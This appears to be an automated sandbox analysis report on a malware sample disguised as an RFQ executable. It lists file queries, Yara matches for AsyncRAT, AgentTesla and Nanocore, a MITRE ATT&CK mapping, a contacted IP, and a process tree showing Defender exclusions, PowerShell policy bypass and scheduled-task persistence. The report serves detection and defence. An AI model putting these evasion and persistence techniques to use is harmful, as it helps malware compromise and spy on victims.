                  Source: C:\Users\user\Desktop\RFQ_GGMC-Ref 12-01-2022.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.ConsoleHost\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.ConsoleHost.dll VolumeInformation
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll VolumeInformation
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Numerics\v4.0_4.0.0.0__b77a5c561934e089\System.Numerics.dll VolumeInformation
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.DirectoryServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.DirectoryServices.dll VolumeInformation
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformation
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Security\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Security.dll | VolumeInformation
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll | VolumeInformation
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll | VolumeInformation
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll | VolumeInformation
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\ | VolumeInformation
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Windows-Defender-Management-Powershell-Group-WOW64-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat | VolumeInformation
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Windows-Defender-Management-Powershell-Group-WOW64-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat | VolumeInformation
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll | VolumeInformation
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll | VolumeInformation
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\ | VolumeInformation
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat | VolumeInformation
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Utility\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Utility.dll | VolumeInformation
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Configuration.Install\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Configuration.Install.dll | VolumeInformation
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat | VolumeInformation
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat | VolumeInformation
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\ | VolumeInformation
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat | VolumeInformation
                  Source: C:\Users\user\Desktop\RFQ_GGMC-Ref 12-01-2022.exe | Queries volume information: C:\Users\user\Desktop\RFQ_GGMC-Ref 12-01-2022.exe | VolumeInformation
                  Source: C:\Users\user\Desktop\RFQ_GGMC-Ref 12-01-2022.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll | VolumeInformation
                  Source: C:\Windows\SysWOW64\cmd.exe | Queries volume information: C:\ | VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\mozille.exe | Queries volume information: C:\Users\user\AppData\Local\Temp\mozille.exe | VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\mozille.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll | VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\mozille.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll | VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\mozille.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll | VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\mozille.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll | VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\mozille.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll | VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\mozille.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll | VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\mozille.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll | VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\mozille.exe | Queries volume information: C:\Users\user\AppData\Local\Temp\mozille.exe | VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\mozille.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll | VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\mozille.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll | VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\mozille.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll | VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\mozille.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll | VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\mozille.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll | VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\mozille.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll | VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\mozille.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll | VolumeInformation
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.ConsoleHost\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.ConsoleHost.dll | VolumeInformation
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll | VolumeInformation
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat | VolumeInformation
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Numerics\v4.0_4.0.0.0__b77a5c561934e089\System.Numerics.dll | VolumeInformation
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.DirectoryServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.DirectoryServices.dll | VolumeInformation
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll | VolumeInformation
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll | VolumeInformation
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll | VolumeInformation
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll | VolumeInformation
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Security\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Security.dll | VolumeInformation
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll | VolumeInformation
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll | VolumeInformation
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll | VolumeInformation
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\ | VolumeInformation
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Windows-Defender-Management-Powershell-Group-WOW64-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat | VolumeInformation
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Windows-Defender-Management-Powershell-Group-WOW64-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat | VolumeInformation
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll | VolumeInformation
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll | VolumeInformation
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\ | VolumeInformation
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat | VolumeInformation
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Utility\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Utility.dll | VolumeInformation
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Configuration.Install\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Configuration.Install.dll | VolumeInformation
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat | VolumeInformation
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat | VolumeInformation
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\ | VolumeInformation
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat | VolumeInformation
                  Source: C:\Users\user\Desktop\RFQ_GGMC-Ref 12-01-2022.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography | MachineGuid

                  Lowering of HIPS / PFW / Operating System Security Settings:

                  Yara detected AsyncRAT
                  Source: Yara match | File source: 7.0.RFQ_GGMC-Ref 12-01-2022.exe.400000.10.unpack, type: UNPACKEDPE
                  Source: Yara match | File source: 7.0.RFQ_GGMC-Ref 12-01-2022.exe.400000.4.unpack, type: UNPACKEDPE
                  Source: Yara match | File source: 7.0.RFQ_GGMC-Ref 12-01-2022.exe.400000.6.unpack, type: UNPACKEDPE
                  Source: Yara match | File source: 7.2.RFQ_GGMC-Ref 12-01-2022.exe.400000.0.unpack, type: UNPACKEDPE
                  Source: Yara match | File source: 7.0.RFQ_GGMC-Ref 12-01-2022.exe.400000.12.unpack, type: UNPACKEDPE
                  Source: Yara match | File source: 7.0.RFQ_GGMC-Ref 12-01-2022.exe.400000.8.unpack, type: UNPACKEDPE
                  Source: Yara match | File source: 0.2.RFQ_GGMC-Ref 12-01-2022.exe.277261c.1.raw.unpack, type: UNPACKEDPE
                  Source: Yara match | File source: 14.2.mozille.exe.26c25b0.1.raw.unpack, type: UNPACKEDPE
                  Source: Yara match | File source: 00000015.00000002.564363154.0000000000402000.00000040.00000001.sdmp, type: MEMORY
                  Source: Yara match | File source: 00000007.00000000.335571895.0000000000402000.00000040.00000001.sdmp, type: MEMORY
                  Source: Yara match | File source: 00000015.00000000.389862678.0000000000402000.00000040.00000001.sdmp, type: MEMORY
                  Source: Yara match | File source: 00000015.00000000.390327325.0000000000402000.00000040.00000001.sdmp, type: MEMORY
                  Source: Yara match | File source: 00000015.00000003.453796076.00000000056C5000.00000004.00000001.sdmp, type: MEMORY
                  Source: Yara match | File source: 00000007.00000000.335001041.0000000000402000.00000040.00000001.sdmp, type: MEMORY
                  Source: Yara match | File source: 00000007.00000002.359864523.0000000000402000.00000040.00000001.sdmp, type: MEMORY
                  Source: Yara match | File source: 00000015.00000000.388653976.0000000000402000.00000040.00000001.sdmp, type: MEMORY
                  Source: Yara match | File source: 00000007.00000000.334452217.0000000000402000.00000040.00000001.sdmp, type: MEMORY
                  Source: Yara match | File source: 00000007.00000000.333878908.0000000000402000.00000040.00000001.sdmp, type: MEMORY
                  Source: Yara match | File source: 00000000.00000002.338424053.0000000002701000.00000004.00000001.sdmp, type: MEMORY
                  Source: Yara match | File source: 00000015.00000000.390769248.0000000000402000.00000040.00000001.sdmp, type: MEMORY
                  Source: Yara match | File source: 00000015.00000002.571714369.00000000031A1000.00000004.00000001.sdmp, type: MEMORY
                  Source: Yara match | File source: 0000000E.00000002.393670309.0000000002651000.00000004.00000001.sdmp, type: MEMORY
                  Source: Yara match | File source: Process Memory Space: RFQ_GGMC-Ref 12-01-2022.exe PID: 6964, type: MEMORYSTR
                  Source: Yara match | File source: Process Memory Space: RFQ_GGMC-Ref 12-01-2022.exe PID: 6948, type: MEMORYSTR
                  Source: Yara match | File source: Process Memory Space: mozille.exe PID: 6316, type: MEMORYSTR

                  Stealing of Sensitive Information:

                  Yara detected Telegram RAT
                  Source: Yara match | File source: 0000001D.00000002.574363580.0000000002F31000.00000004.00000001.sdmp, type: MEMORY
                  Yara detected AgentTesla
                  Source: Yara match | File source: 0000001D.00000000.485797688.0000000000402000.00000040.00000001.sdmp, type: MEMORY
                  Source: Yara match | File source: 0000001D.00000000.487776252.0000000000402000.00000040.00000001.sdmp, type: MEMORY
                  Source: Yara match | File source: 0000001D.00000000.486771579.0000000000402000.00000040.00000001.sdmp, type: MEMORY
                  Source: Yara match | File source: 0000001D.00000000.484899643.0000000000402000.00000040.00000001.sdmp, type: MEMORY
                  Source: Yara match | File source: 0000001D.00000002.564381690.0000000000402000.00000040.00000001.sdmp, type: MEMORY
                  Source: Yara match | File source: 0000001B.00000002.493963326.00000000042D9000.00000004.00000001.sdmp, type: MEMORY
                  Source: Yara match | File source: 0000001D.00000002.574363580.0000000002F31000.00000004.00000001.sdmp, type: MEMORY
                  Yara detected Nanocore RAT
                  Source: Yara match | File source: 00000028.00000000.532162937.0000000000402000.00000040.00000001.sdmp, type: MEMORY
                  Source: Yara match | File source: 00000028.00000000.533503527.0000000000402000.00000040.00000001.sdmp, type: MEMORY
                  Source: Yara match | File source: 00000028.00000002.575326002.0000000003B89000.00000004.00000001.sdmp, type: MEMORY
                  Source: Yara match | File source: 00000028.00000000.534610587.0000000000402000.00000040.00000001.sdmp, type: MEMORY
                  Source: Yara match | File source: 00000028.00000000.531340924.0000000000402000.00000040.00000001.sdmp, type: MEMORY
                  Source: Yara match | File source: 00000028.00000002.578385897.0000000005530000.00000004.00020000.sdmp, type: MEMORY
                  Source: Yara match | File source: 00000021.00000002.539866646.00000000043B9000.00000004.00000001.sdmp, type: MEMORY
                  Source: Yara match | File source: 00000028.00000002.564500309.0000000000402000.00000040.00000001.sdmp, type: MEMORY
                  Source: Yara match | File source: 00000028.00000002.572373638.0000000002B81000.00000004.00000001.sdmp, type: MEMORY
                  Source: Yara match | File source: 0000001D.00000002.574363580.0000000002F31000.00000004.00000001.sdmp, type: MEMORY

                  Remote Access Functionality:

                  Yara detected Telegram RAT
                  Source: Yara match | File source: 0000001D.00000002.574363580.0000000002F31000.00000004.00000001.sdmp, type: MEMORY
                  Yara detected AgentTesla
                  Source: Yara match | File source: 0000001D.00000000.485797688.0000000000402000.00000040.00000001.sdmp, type: MEMORY
                  Source: Yara match | File source: 0000001D.00000000.487776252.0000000000402000.00000040.00000001.sdmp, type: MEMORY
                  Source: Yara match | File source: 0000001D.00000000.486771579.0000000000402000.00000040.00000001.sdmp, type: MEMORY
                  Source: Yara match | File source: 0000001D.00000000.484899643.0000000000402000.00000040.00000001.sdmp, type: MEMORY
                  Source: Yara match | File source: 0000001D.00000002.564381690.0000000000402000.00000040.00000001.sdmp, type: MEMORY
                  Source: Yara match | File source: 0000001B.00000002.493963326.00000000042D9000.00000004.00000001.sdmp, type: MEMORY
                  Source: Yara match | File source: 0000001D.00000002.574363580.0000000002F31000.00000004.00000001.sdmp, type: MEMORY
                  Yara detected Nanocore RAT
                  Source: Yara match | File source: 00000028.00000000.532162937.0000000000402000.00000040.00000001.sdmp, type: MEMORY
                  Source: Yara match | File source: 00000028.00000000.533503527.0000000000402000.00000040.00000001.sdmp, type: MEMORY
                  Source: Yara match | File source: 00000028.00000002.575326002.0000000003B89000.00000004.00000001.sdmp, type: MEMORY
                  Source: Yara match | File source: 00000028.00000000.534610587.0000000000402000.00000040.00000001.sdmp, type: MEMORY
                  Source: Yara match | File source: 00000028.00000000.531340924.0000000000402000.00000040.00000001.sdmp, type: MEMORY
                  Source: Yara match | File source: 00000028.00000002.578385897.0000000005530000.00000004.00020000.sdmp, type: MEMORY
                  Source: Yara match | File source: 00000021.00000002.539866646.00000000043B9000.00000004.00000001.sdmp, type: MEMORY
                  Source: Yara match | File source: 00000028.00000002.564500309.0000000000402000.00000040.00000001.sdmp, type: MEMORY
                  Source: Yara match | File source: 00000028.00000002.572373638.0000000002B81000.00000004.00000001.sdmp, type: MEMORY

                  Mitre Att&ck Matrix

                  Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Exfiltration | Command and Control | Network Effects | Remote Service Effects | Impact
                  Valid Accounts | Scheduled Task/Job2 | Scheduled Task/Job2 | Process Injection12 | Masquerading1 | Input Capture1 | Security Software Discovery11 | Remote Services | Input Capture1 | Exfiltration Over Other Network Medium | Encrypted Channel1 | Eavesdrop on Insecure Network Communication | Remotely Track Device Without Authorization | Modify System Partition
                  Default Accounts | Scripting1 | Boot or Logon Initialization Scripts | Scheduled Task/Job2 | Disable or Modify Tools11 | LSASS Memory | Process Discovery2 | Remote Desktop Protocol | Archive Collected Data11 | Exfiltration Over Bluetooth | Non-Standard Port1 | Exploit SS7 to Redirect Phone Calls/SMS | Remotely Wipe Data Without Authorization | Device Lockout
                  Domain Accounts | PowerShell2 | Logon Script (Windows) | Logon Script (Windows) | Virtualization/Sandbox Evasion21 | Security Account Manager | Virtualization/Sandbox Evasion21 | SMB/Windows Admin Shares | Data from Network Shared Drive | Automated Exfiltration | Steganography | Exploit SS7 to Track Device Location | Obtain Device Cloud Backups | Delete Device Data
                  Local Accounts | At (Windows) | Logon Script (Mac) | Logon Script (Mac) | Process Injection12 | NTDS | Application Window Discovery1 | Distributed Component Object Model | Input Capture | Scheduled Transfer | Protocol Impersonation | SIM Card Swap | | Carrier Billing Fraud
                  Cloud Accounts | Cron | Network Logon Script | Network Logon Script | Deobfuscate/Decode Files or Information1 | LSA Secrets | File and Directory Discovery1 | SSH | Keylogging | Data Transfer Size Limits | Fallback Channels | Manipulate Device Communication | | Manipulate App Store Rankings or Ratings
                  Replication Through Removable Media | Launchd | Rc.common | Rc.common | Scripting1 | Cached Domain Credentials | System Information Discovery13 | VNC | GUI Input Capture | Exfiltration Over C2 Channel | Multiband Communication | Jamming or Denial of Service | | Abuse Accessibility Features
                  External Remote Services | Scheduled Task | Startup Items | Startup Items | Obfuscated Files or Information12 | DCSync | Network Sniffing | Windows Remote Management | Web Portal Capture | Exfiltration Over Alternative Protocol | Commonly Used Port | Rogue Wi-Fi Access Points | | Data Encrypted for Impact
                  Drive-by Compromise | Command and Scripting Interpreter | Scheduled Task/Job | Scheduled Task/Job | Software Packing23 | Proc Filesystem | Network Service Scanning | Shared Webroot | Credential API Hooking | Exfiltration Over Symmetric Encrypted Non-C2 Protocol | Application Layer Protocol | Downgrade to Insecure Protocols | | Generate Fraudulent Advertising Revenue

                  Behavior Graph

                  Behavior Graph ID: 551470 | Sample: RFQ_GGMC-Ref 12-01-2022.exe | Start date: 12/01/2022 | Architecture: WINDOWS | Score: 100

                  Network contact: 89.238.150.43 (ports 49720, 49722, 49723), M247GB, United Kingdom

                  Signatures on the sample: Snort IDS alert for network traffic (e.g. based on Emerging Threat rules); Malicious sample detected (through community Yara rule); Multi AV Scanner detection for submitted file; 14 other signatures

                  Process tree (graph node numbers in parentheses):
                  RFQ_GGMC-Ref 12-01-2022.exe (10)
                    dropped: C:\Users\user\AppData\...\lhWbLvHNlciwu.exe (PE32); C:\Users\user\AppData\Local\...\tmp71CD.tmp (XML); C:\Users\...\RFQ_GGMC-Ref 12-01-2022.exe.log (ASCII)
                    signature: Adds a directory exclusion to Windows Defender
                    started: RFQ_GGMC-Ref 12-01-2022.exe (16)
                      dropped: C:\Users\user\AppData\Local\...\mozille.exe (PE32)
                      started: cmd.exe (29)
                        signatures: Suspicious powershell command line found; Bypasses PowerShell execution policy
                        started: conhost.exe (40); schtasks.exe (42)
                      started: cmd.exe (32)
                        started: mozille.exe (44)
                          signature: Adds a directory exclusion to Windows Defender
                          started: powershell.exe (51)
                        started: conhost.exe (47); timeout.exe (49)
                    started: powershell.exe (19)
                      started: conhost.exe (34)
                    started: schtasks.exe (21)
                      started: conhost.exe (36)
                    started: RFQ_GGMC-Ref 12-01-2022.exe (23)
                  mozille.exe (14)
                    started: powershell.exe (25)
                      started: conhost.exe (38)
                    started: schtasks.exe (27)

                  Screenshots

                  Thumbnails

                  This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                  Antivirus, Machine Learning and Genetic Malware Detection

                  Initial Sample

                  Source | Detection | Scanner | Label
                  RFQ_GGMC-Ref 12-01-2022.exe | 26% | Virustotal |

                  Dropped Files

                  No Antivirus matches

                  Unpacked PE Files

                  Source | Detection | Scanner | Label
                  7.0.RFQ_GGMC-Ref 12-01-2022.exe.400000.4.unpack | 100% | Avira | TR/Dropper.Gen
                  7.0.RFQ_GGMC-Ref 12-01-2022.exe.400000.10.unpack | 100% | Avira | TR/Dropper.Gen
                  7.0.RFQ_GGMC-Ref 12-01-2022.exe.400000.6.unpack | 100% | Avira | TR/Dropper.Gen
                  7.2.RFQ_GGMC-Ref 12-01-2022.exe.400000.0.unpack | 100% | Avira | TR/Dropper.Gen
